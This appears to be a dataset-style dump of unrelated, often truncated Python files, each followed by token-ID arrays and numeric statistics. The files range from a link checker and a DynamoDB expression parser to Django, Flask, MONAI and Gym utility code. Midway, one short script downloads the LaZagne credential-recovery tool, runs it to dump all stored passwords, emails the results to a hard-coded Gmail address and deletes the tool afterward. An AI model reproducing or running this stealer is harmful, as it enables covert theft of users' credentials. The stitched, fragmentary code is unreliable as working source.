# (spiderURL and printReport are called below; their definitions are not
#  included in this extract)
#######################################

# Main program
#
# Get command line options
parser = argparse.ArgumentParser(description='A Python-based link checker.')
parser.add_argument('-f', '--format', required=False, default='txt',
                    help='Output file format')
parser.add_argument('-l', '--limit', required=False, default=2,
                    help='Limit directory depth, example.com/limit/dir/depth/')
parser.add_argument('-u', '--url', help='Base URL to check', required=True)
parser.add_argument('-o', '--output', help='Output file name', required=False)
args = parser.parse_args()

# Assign program arguments to variables
# - we may want to add a '/' to baseurl if it's not present.
# - if the href links are relative we need to add the baseurl when checking
#   the link.
baseurl = str(args.url)
pathlimit = int(args.limit)

# Show values
print 'Base URL: %s' % args.url
print 'Output file format: %s' % args.format
print 'Output file: %s' % args.output
print 'Limit spider: %d' % pathlimit

# Grab today's date for timestamping output file.
now = datetime.now()
tstamp = now.strftime("%Y%m%d-%H%M")

# Grab all a href links
checkurl = urllib2.urlopen(baseurl).read()
soup = BeautifulSoup(checkurl, 'html.parser')

# Spider the site and build our list of URLs to check
spiderURL(baseurl, pathlimit)

deadlinks = []
# This for loop will completely change once the spiderURL function is working.
# We'll iterate over the various directory paths instead.
outofscope = 0
# Check the URLs
for link in soup("a"):
    # Fetch the link but only return the status code.
    # hrefs are unpredictable; we can add a function to 'clean' them up, i.e.,
    # get the proto, domain, path, file (TODO: for a complete solution we
    # need to get all of this)
    #if baseurl[:-1] == '/':
    #    print '[debug] strip last char from baseurl'

    # mailto: is causing an error
    href = link.get('href')
    print '[debug] href: %s' % href
    if re.match('^mailto', href):
        # skip this one
        continue

    # Separate the file from the path
    thisurl = urlparse(href)
    if thisurl.netloc != baseurl and thisurl.netloc != '':
        print '[-] HREF %s is out of scope' % thisurl.netloc
        outofscope = 1
    else:
        print '[debug] path %s' % thisurl.path
        outofscope = 0

    # Build the full URL if the href is relative.
    # - assuming, for now, other protocols are not desired
    # - place this in the Spider function
    try:
        if re.match('^http', href):
            checkurl = href
        else:
            checkurl = baseurl + href
    except:
        print '[-] Unknown error in re.match()'

    try:
        #print '[+] checking %s' % checkurl
        hrefpage = urllib2.urlopen(checkurl)
    except urllib2.HTTPError as e:
        if e.code == 404:
            print '[-] 404 ERROR: %s' % checkurl
            # add this URL to deadlink list
            deadlinks.append(checkurl)
        else:
            print '[-] HTTP ERROR: %d - %s' % (e.code, checkurl)
    except urllib2.URLError as e:
        # Not an HTTP-specific error (e.g. connection refused);
        # URLError has no .code attribute, so report .reason instead.
        print '[-] NON-HTTP ERROR: %s - %s' % (e.reason, checkurl)
    else:
        print '[+] Status %d for %s' % (hrefpage.getcode(), checkurl)

printReport(deadlinks)

# EOF
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 357, 66, 8, 1584, 15551, 18292, 220, 198, 2, 198, 2, 317, 11361, 12, 3106, 2792, 2198, 263, 13, 198, 2, 220, 220, 198, 2, 29566, 25, 279, 2645, 676, 9122, 13, 9078...
3.024924
1,324
import logging
from abc import abstractmethod
import abc
import six
from collections import deque

from moto.dynamodb2.parsing.ast_nodes import (
    UpdateExpression,
    UpdateExpressionSetClause,
    UpdateExpressionSetActions,
    UpdateExpressionSetAction,
    UpdateExpressionRemoveActions,
    UpdateExpressionRemoveAction,
    UpdateExpressionPath,
    UpdateExpressionValue,
    UpdateExpressionGroupedValue,
    UpdateExpressionRemoveClause,
    ExpressionPathDescender,
    ExpressionSelector,
    ExpressionAttribute,
    ExpressionAttributeName,
    ExpressionAttributeValue,
    ExpressionValueOperator,
    UpdateExpressionFunction,
    UpdateExpressionAddClause,
    UpdateExpressionAddActions,
    UpdateExpressionAddAction,
    UpdateExpressionDeleteAction,
    UpdateExpressionDeleteActions,
    UpdateExpressionDeleteClause,
)
from moto.dynamodb2.exceptions import InvalidTokenException, InvalidUpdateExpression
from moto.dynamodb2.parsing.tokens import Token, ExpressionTokenizer


# ExpressionParser, NestableExpressionParserMixin and
# UpdateExpressionActionsParser are defined elsewhere in the original module.
class UpdateExpressionParser(ExpressionParser, NestableExpressionParserMixin):
    """
    Parser to create update expressions
    """

    def __init__(self, *args, **kwargs):
        super(UpdateExpressionParser, self).__init__(*args, **kwargs)
        NestableExpressionParserMixin.__init__(self)

    def _parse(self):
        """
        Update Expression is the top-most node therefore it is expected to end
        up at the end of the expression.
        """
        while True:
            self.skip_white_space()
            if self.is_at_end():
                logging.debug("End reached")
                break
            elif self._parse_by_a_subfactory():
                continue
            else:
                self.raise_unexpected_token()

        return self._create_node()


class UpdateExpressionSetActionsParser(UpdateExpressionActionsParser):
    """
    UpdateExpressionSetActions
    """


class UpdateExpressionAttributeValueParser(ExpressionParser):
    pass  # body omitted in this row
[ 11748, 18931, 198, 6738, 450, 66, 1330, 12531, 24396, 198, 11748, 450, 66, 198, 11748, 2237, 198, 6738, 17268, 1330, 390, 4188, 198, 198, 6738, 285, 2069, 13, 67, 4989, 375, 65, 17, 13, 79, 945, 278, 13, 459, 62, 77, 4147, 1330, 3...
2.722071
734
# -*- coding: utf-8 -*-

"""The graphical part of a DFTB+ Optimization node"""

import logging
import tkinter as tk
import tkinter.ttk as ttk

import dftbplus_step

logger = logging.getLogger(__name__)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 464, 27831, 636, 286, 257, 360, 9792, 33, 10, 30011, 1634, 10139, 37811, 198, 198, 11748, 18931, 198, 11748, 256, 74, 3849, 355, 256, 74, 198, 11748, 256, ...
2.636364
77
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Console configuration module."""

from Crypto.PublicKey import RSA
import socket
import os
import base64
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 201, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 201, 198, 37811, 44, 67, 43348, 390, 4566, 5330, 78, 23430, 22629, 201, 198, 201, 198, 37811, 201, 198, 201, 198,...
2.514706
68
""" Django settings for marion project. """ from pathlib import Path from tempfile import mkdtemp from configurations import Configuration, values BASE_DIR = Path(__file__).parent.resolve() DATA_DIR = Path("/data") # pylint: disable=no-init
[ 37811, 198, 35, 73, 14208, 6460, 329, 1667, 295, 1628, 13, 198, 37811, 198, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 20218, 7753, 1330, 33480, 67, 29510, 198, 198, 6738, 25412, 1330, 28373, 11, 3815, 198, 198, 33, 11159, 62, 347...
3.179487
78
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import grpc

from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub

from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
    LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
[ 2, 198, 2, 49962, 284, 262, 24843, 10442, 5693, 357, 1921, 37, 8, 739, 530, 393, 517, 198, 2, 18920, 5964, 11704, 13, 220, 4091, 262, 28536, 2393, 9387, 351, 198, 2, 428, 670, 329, 3224, 1321, 5115, 6634, 9238, 13, 198, 2, 383, ...
3.893764
433
# Generated by Django 3.0.3 on 2020-02-07 19:59

from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 15, 13, 18, 319, 12131, 12, 2999, 12, 2998, 678, 25, 3270, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
db = SQLAlchemy(app)

from space_trace import views, cli
[ 11748, 284, 4029, 198, 6738, 42903, 1330, 46947, 198, 6738, 42903, 62, 25410, 282, 26599, 1330, 16363, 2348, 26599, 628, 198, 1324, 796, 46947, 7, 834, 3672, 834, 11, 4554, 62, 43762, 62, 11250, 28, 17821, 8, 198, 1324, 13, 11250, 13,...
3.025
80
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from enum import Enum
from .NormalDist import NormalDist
from .UniformDist import UniformDist
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 18931, 198, 6738, 33829, 1330, 2039, 388, 198, 6738, 764, 26447, 20344, 1330, 14435, 20344, 198, 6738, 764, ...
3.14
50
import os
import sys

filename = sys.argv[1]
from_id = int(sys.argv[2])
to_id = int(sys.argv[3])  # was argv[2] in the original, which collapsed the range to one id

for i in range(from_id, to_id + 1):
    # the original called sys.system(), which does not exist; os.system() is meant
    os.system("mv {0}.in{1} {0}{1}.in".format(filename, i))
    os.system("mv {0}.out{1} {0}{1}.out".format(filename, i))
[ 11748, 28686, 198, 11748, 25064, 198, 198, 34345, 796, 25064, 13, 853, 85, 58, 16, 60, 198, 6738, 62, 312, 796, 493, 7, 17597, 13, 853, 85, 58, 17, 12962, 198, 1462, 62, 312, 796, 493, 7, 17597, 13, 853, 85, 58, 17, 12962, 198, ...
2.114754
122
from django.urls import path
from . import views


urlpatterns = [
    path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
    path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
    path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
    path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
    path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
    path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
]
[ 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 198, 6738, 764, 1330, 5009, 628, 198, 6371, 33279, 82, 796, 685, 198, 220, 220, 220, 3108, 10786, 39014, 14, 3256, 5009, 13, 33762, 14478, 23416, 11, 1438, 11639, 7645, 270, 12, 6603, 12, ...
3.390863
197
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc

app = dash.Dash(__name__)

app.layout = html.Div([
    dcc.Textarea(
        id='textarea-example',
        value='Textarea content initialized\nwith multiple lines of text',
        style={'width': '100%', 'height': 300},
    ),
    html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])

if __name__ == '__main__':
    app.run_server(debug=True)
[ 11748, 14470, 198, 6738, 14470, 13, 45841, 3976, 1330, 23412, 11, 25235, 198, 11748, 14470, 62, 6494, 62, 5589, 3906, 355, 27711, 198, 11748, 14470, 62, 7295, 62, 5589, 3906, 355, 288, 535, 198, 198, 1324, 796, 14470, 13, 43041, 7, 83...
2.657754
187
import pytest
from selenium.common.exceptions import WebDriverException

from wrapped_driver import WrappedDriver


def test_empty_chromedriver_path():
    """Assert error is raised if no chromedriver path is used"""
    with pytest.raises(WebDriverException):
        WrappedDriver(executable_path="", headless=True)


def test_no_chromedriver_path():
    """Assert error is raised if no chromedriver path is used"""
    with pytest.raises(TypeError):
        WrappedDriver(headless=True)
[ 11748, 12972, 9288, 198, 6738, 384, 11925, 1505, 13, 11321, 13, 1069, 11755, 1330, 5313, 32103, 16922, 198, 198, 6738, 12908, 62, 26230, 1330, 27323, 1496, 32103, 628, 198, 4299, 1332, 62, 28920, 62, 28663, 276, 38291, 62, 6978, 33529, ...
3.043478
161
from rlp.sedes import (
    CountableList,
)
from eth.rlp.headers import (
    BlockHeader,
)
from eth.vm.forks.byzantium.blocks import (
    ByzantiumBlock,
)
from .transactions import (
    PetersburgTransaction,
)
[ 6738, 374, 34431, 13, 36622, 274, 1330, 357, 198, 220, 220, 220, 2764, 540, 8053, 11, 198, 8, 198, 6738, 4555, 13, 81, 34431, 13, 50145, 1330, 357, 198, 220, 220, 220, 9726, 39681, 11, 198, 8, 198, 6738, 4555, 13, 14761, 13, 1640,...
2.638554
83
# Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#     http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import argparse
import inspect
import os
import sys
import time
import unittest

from monai.utils import PerfContext

results: dict = dict()

if __name__ == "__main__":
    loader = unittest.TestLoader()
    # get_default_pattern, parse_args, TimeLoggingTestResult and print_results
    # are defined elsewhere in the original file.
    default_pattern = get_default_pattern(loader)

    # Parse input arguments
    args = parse_args(default_pattern)

    # If quick is desired, set environment variable
    if args.quick:
        os.environ["QUICKTEST"] = "True"

    # Get all test names (optionally from some path with some pattern)
    with PerfContext() as pc:
        tests = loader.discover(args.path, args.pattern)
    discovery_time = pc.total_time
    print(f"time to discover tests: {discovery_time}s")

    test_runner = unittest.runner.TextTestRunner(
        resultclass=TimeLoggingTestResult, verbosity=args.verbosity, failfast=args.failfast
    )
    # Use try catches to print the current results if encountering exception or keyboard interruption
    try:
        test_result = test_runner.run(tests)
        print_results(results, discovery_time, args.thresh, "tests finished")
        sys.exit(not test_result.wasSuccessful())
    except KeyboardInterrupt:
        print_results(results, discovery_time, args.thresh, "tests cancelled")
        sys.exit(1)
    except Exception:
        print_results(results, discovery_time, args.thresh, "exception reached")
        raise
[ 2, 15069, 12131, 25000, 20185, 42727, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, 921, 743, 7330,...
3.11859
624
""" transforms.py is for shape-preserving functions. """ import numpy as np
[ 37811, 201, 198, 7645, 23914, 13, 9078, 318, 329, 5485, 12, 18302, 14344, 5499, 13, 201, 198, 37811, 201, 198, 201, 198, 11748, 299, 32152, 355, 45941, 201, 198, 201, 198 ]
2.709677
31
from __future__ import unicode_literals

from django.db import models
from django.utils.translation import ugettext as _
[ 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 26791, 13, 41519, 1330, 334, 1136, 5239, 355, 4808, 628 ]
3.588235
34
from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
[ 6738, 450, 66, 1330, 9738, 48526, 11, 12531, 24396, 198, 6738, 1216, 38599, 1130, 13, 16794, 364, 13, 69, 1313, 660, 1130, 62, 6371, 82, 1330, 1216, 38599, 1130, 62, 6371, 82, 198, 11748, 19720, 198, 11748, 474, 46569, 198, 11748, 700...
3.375
64
# coding: utf-8

# Copyright 2021 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     [http://www.apache.org/licenses/LICENSE-2.0]
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

############# This file is auto-generated. Do not edit! #############

"""
SDC Service: Action Service

With the Action service in Splunk Cloud Services, you can receive incoming trigger events and use pre-defined action templates to turn these events into meaningful actions.

OpenAPI spec version: v1beta2.12 (recommended default)
Generated by: https://openapi-generator.tech
"""

from requests import Response
from string import Template
from typing import List, Dict

from splunk_sdk.base_client import handle_response
from splunk_sdk.base_service import BaseService
from splunk_sdk.common.sscmodel import SSCModel, SSCVoidModel

from splunk_sdk.action.v1beta2.gen_models import Action
from splunk_sdk.action.v1beta2.gen_models import ActionMutable
from splunk_sdk.action.v1beta2.gen_models import ActionResult
from splunk_sdk.action.v1beta2.gen_models import ActionResultEmailDetail
from splunk_sdk.action.v1beta2.gen_models import PublicWebhookKey
from splunk_sdk.action.v1beta2.gen_models import ServiceError
from splunk_sdk.action.v1beta2.gen_models import TriggerEvent
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 2, 15069, 220, 33448, 13341, 2954, 11, 3457, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 1, 2599, 345, 743, 198, 2, 407, 779, 428, ...
3.427126
494
from flask import Blueprint


home_bp = Blueprint('home', __name__)

from . import views  # noqa
[ 6738, 42903, 1330, 39932, 628, 198, 11195, 62, 46583, 796, 39932, 10786, 11195, 3256, 11593, 3672, 834, 8, 198, 198, 6738, 764, 1330, 5009, 220, 1303, 645, 20402, 198 ]
3.344828
29
#!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile

temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)

# download and send_mail are called below; their definitions are not
# included in this extract.
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe")  # LaZagne

result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("youremail@gmail.com", "yourpassword", result)

os.remove("lazagne.exe")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 11748, 7007, 198, 11748, 850, 14681, 198, 11748, 895, 83, 489, 571, 198, 11748, 302, 198, 11748, 28686, 198, 11748, 20218, 7753, 628, 628, 198, 29510, 62, 15908, 796, 20218, 7753, ...
2.744966
149
from SmartAPI.rdf.List import List
[ 6738, 10880, 17614, 13, 4372, 69, 13, 8053, 1330, 7343, 198 ]
3.181818
11
##################################################################################################
# Copyright (c) 2012 Brett Dixon
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################

"""
Gallery API

::

    GET     /        Lists the galleries currently visible by the current user
    POST    /        Creates a gallery object
    GET     /id      Gallery object if visible by the current user
    PUT     /id      Adds image or video objects to the gallery
    DELETE  /id      Removes image or video objects from the gallery
    GET     /filter  Returns a filtered list of image and video objects
"""

import time
import functools
import logging

import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json

try:
    from haystack.query import SearchQuerySet

    HAYSTACK = True
except (ImportError, ImproperlyConfigured):
    HAYSTACK = False

from frog.models import (
    Gallery,
    Image,
    Video,
    Group,
    GallerySubscription,
    SiteConfig,
    Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP


LOGGER = logging.getLogger("frog")
try:
    QUERY_MODELS = [
        _
        for _ in ContentType.objects.filter(app_label="frog")
        if issubclass(_.model_class(), Piece)
    ]
except ProgrammingError:
    pass

BATCH_LENGTH = 75


def index(request, obj_id=None):
    """Handles a request based on method and calls the appropriate function"""
    if request.method == "GET":
        return get(request, obj_id)
    elif request.method == "POST":
        return post(request)
    elif request.method == "PUT":
        return put(request, obj_id)
    elif request.method == "DELETE":
        return delete(request, obj_id)


def _filter(request, object_, tags=None, more=False, orderby="created"):
    """Filters Piece objects from self based on filters, search, and range

    :param tags: List of tag IDs to filter
    :type tags: list
    :param more: Returns more of the same filtered set of images based on session range
    :type more: bool

    :return: list, Objects filtered
    """
    res = Result()

    idDict = {}
    objDict = {}
    data = {}
    modelmap = {}

    # Get all IDs for each model
    for m in QUERY_MODELS:
        modelmap[m.model_class()] = m.model

        if object_:
            idDict[m.model] = m.model_class().objects.filter(gallery=object_)
        else:
            idDict[m.model] = m.model_class().objects.all()

        if idDict[m.model] is None:
            continue

        if tags:
            for bucket in tags:
                searchQuery = ""
                o = None
                for item in bucket:
                    if item == 0:
                        # filter by tagless
                        idDict[m.model].annotate(num_tags=Count("tags"))
                        if not o:
                            o = Q()
                        o |= Q(num_tags__lte=1)
                        break
                    elif isinstance(item, six.integer_types):
                        # filter by tag
                        if not o:
                            o = Q()
                        o |= Q(tags__id=item)
                    else:
                        # add to search string
                        searchQuery += item + " "
                        if not HAYSTACK:
                            if not o:
                                o = Q()
                            # use a basic search
                            o |= Q(title__icontains=item)

                if HAYSTACK and searchQuery != "":
                    # once all tags have been filtered, filter by search
                    searchIDs = search(searchQuery, m.model_class())
                    if searchIDs:
                        if not o:
                            o = Q()
                        o |= Q(id__in=searchIDs)

                if o:
                    # apply the filters
                    idDict[m.model] = (
                        idDict[m.model]
                        .annotate(num_tags=Count("tags"))
                        .filter(o)
                    )
                else:
                    idDict[m.model] = idDict[m.model].none()

        # Remove hidden items before slicing so we get an accurate count
        idDict[m.model] = idDict[m.model].exclude(hidden=True)
        # Remove deleted items before slicing so we get an accurate count
        idDict[m.model] = idDict[m.model].exclude(deleted=True)
        # Get all ids of filtered objects, this will be a very fast query
        idDict[m.model] = list(
            idDict[m.model]
            .order_by("-{}".format(orderby))
            .values_list("id", flat=True)
        )

        lastid = request.session.get("last_{}".format(m.model), 0)

        if not idDict[m.model]:
            continue

        if not more:
            lastid = idDict[m.model][0]

        try:
            index = idDict[m.model].index(lastid)
        except ValueError:
            index = 0

        if more and lastid != 0:
            index += 1

        idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]

        # perform the main query to retrieve the objects we want
        objDict[m.model] = m.model_class().objects.filter(
            id__in=idDict[m.model]
        )
        objDict[m.model] = (
            objDict[m.model]
            .select_related("author")
            .prefetch_related("tags")
            .order_by("-{}".format(orderby))
        )
        objDict[m.model] = list(objDict[m.model])

    # combine and sort all objects by date
    objects = _sortObjects(orderby, **objDict)
    objects = objects[:BATCH_LENGTH]

    # Find out last ids
    lastids = {}
    for obj in objects:
        lastids["last_{}".format(modelmap[obj.__class__])] = obj.id

    for key, value in lastids.items():
        request.session[key] = value

    # serialize objects
    for i in objects:
        res.append(i.json())

    data["count"] = len(objects)

    if settings.DEBUG:
        data["queries"] = connection.queries

    res.value = data

    return JsonResponse(res.asDict())


def _sortObjects(orderby="created", **kwargs):
    """Sorts lists of objects and combines them into a single list"""
    o = []

    for m in kwargs.values():
        for l in iter(m):
            o.append(l)
    o = list(set(o))
    sortfunc = _sortByCreated if orderby == "created" else _sortByModified
    if six.PY2:
        o.sort(sortfunc)
    else:
        o.sort(key=functools.cmp_to_key(sortfunc))

    return o


def _sortByCreated(a, b):
    """Sort function for object by created date"""
    if a.created < b.created:
        return 1
    elif a.created > b.created:
        return -1
    else:
        return 0


def _sortByModified(a, b):
    """Sort function for object by modified date"""
    if a.modified < b.modified:
        return 1
    elif a.modified > b.modified:
        return -1
    else:
        return 0


def search(query, model):
    """Performs a search query and returns the object ids"""
    query = query.strip()
    LOGGER.debug(query)
    sqs = SearchQuerySet()
    results = sqs.raw_search("{}*".format(query)).models(model)
    if not results:
        results = sqs.raw_search("*{}".format(query)).models(model)
    if not results:
        results = sqs.raw_search("*{}*".format(query)).models(model)

    return [o.pk for o in results]
[ 29113, 29113, 29113, 2235, 198, 2, 15069, 357, 66, 8, 2321, 18726, 31178, 198, 2, 198, 2, 2448, 3411, 318, 29376, 7520, 11, 1479, 286, 3877, 11, 284, 597, 1048, 16727, 257, 4866, 286, 198, 2, 428, 3788, 290, 3917, 10314, 3696, 357, ...
2.28226
3,929
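# The gallery module above keeps Python 2-style cmp sorters and bridges them
# with functools.cmp_to_key on Python 3. A minimal standalone illustration of
# that pattern (plain objects with a `created` attribute stand in for pieces):
import functools
from types import SimpleNamespace

def by_created_desc(a, b):
    # newest first, mirroring _sortByCreated in the row above
    return (a.created < b.created) - (a.created > b.created)

items = [SimpleNamespace(created=t) for t in (3, 1, 2)]
items.sort(key=functools.cmp_to_key(by_created_desc))
print([i.created for i in items])  # [3, 2, 1]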
# uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: pirates.speedchat.PSpeedChatQuestMenu from otp.speedchat.SCMenu import SCMenu from otp.speedchat.SCTerminal import * from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal from pirates.quest.Quest import Quest from pirates.speedchat.PSpeedChatQuestTerminal import * from pirates.pirate.LocalPirate import * from pirates.quest.QuestStatus import * from pirates.quest.QuestDNA import *
[ 2, 34318, 2349, 21, 2196, 513, 13, 17, 13, 15, 198, 2, 11361, 18022, 8189, 362, 13, 19, 357, 38850, 5333, 8, 198, 2, 4280, 3361, 3902, 422, 25, 11361, 362, 13, 22, 13, 1415, 357, 85, 17, 13, 22, 13, 1415, 25, 23, 34825, 1129, ...
3.052632
190
# from redbot.core import Config from redbot.core import Config, commands, checks import asyncio import aiohttp import discord from discord import Webhook, AsyncWebhookAdapter import re
[ 2, 422, 2266, 13645, 13, 7295, 1330, 17056, 198, 6738, 2266, 13645, 13, 7295, 1330, 17056, 11, 9729, 11, 8794, 198, 11748, 30351, 952, 198, 11748, 257, 952, 4023, 198, 11748, 36446, 198, 6738, 36446, 1330, 5313, 25480, 11, 1081, 13361, ...
3.875
48
#The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

import hashlib
import numpy as np
import os
import struct

# ANSI color palette; assumed from the upstream Gym helper this excerpt is
# based on, since the sample itself elides the mapping colorize() needs.
color2num = dict(gray=30, red=31, green=32, yellow=33, blue=34,
                 magenta=35, cyan=36, white=37, crimson=38)


def colorize(string, color, bold=False, highlight=False):
    """Return string surrounded by appropriate terminal color codes to
    print colorized text.  Valid colors: gray, red, green, yellow,
    blue, magenta, cyan, white, crimson
    """

    attr = []
    num = color2num[color]
    if highlight: num += 10
    attr.append(str(num))
    if bold: attr.append('1')
    attrs = ';'.join(attr)
    return '\x1b[%sm%s\x1b[0m' % (attrs, string)


def hash_seed(seed=None, max_bytes=8):
    """Any given evaluation is likely to have many PRNG's active at once.
    (Most commonly, because the environment is running in multiple
    processes.) There's literature indicating that having linear
    correlations between seeds of multiple PRNG's can correlate the
    outputs:

    http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
    http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
    http://dl.acm.org/citation.cfm?id=1276928

    Thus, for sanity we hash the seeds before using them. (This scheme is
    likely not crypto-strength, but it should be good enough to get rid of
    simple correlations.)

    Args:
        seed (Optional[int]): None seeds from an operating system specific randomness source.
        max_bytes: Maximum number of bytes to use in the hashed seed.
    """
    if seed is None:
        seed = create_seed(max_bytes=max_bytes)
    hash = hashlib.sha512(str(seed).encode('utf8')).digest()
    return _bigint_from_bytes(hash[:max_bytes])


def create_seed(a=None, max_bytes=8):
    """Create a strong random seed. Otherwise, Python 2 would seed using
    the system time, which might be non-robust especially in the presence
    of concurrency.

    Args:
        a (Optional[int, str]): None seeds from an operating system specific randomness source.
        max_bytes: Maximum number of bytes to use in the seed.
    """
    # Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
    if a is None:
        a = _bigint_from_bytes(os.urandom(max_bytes))
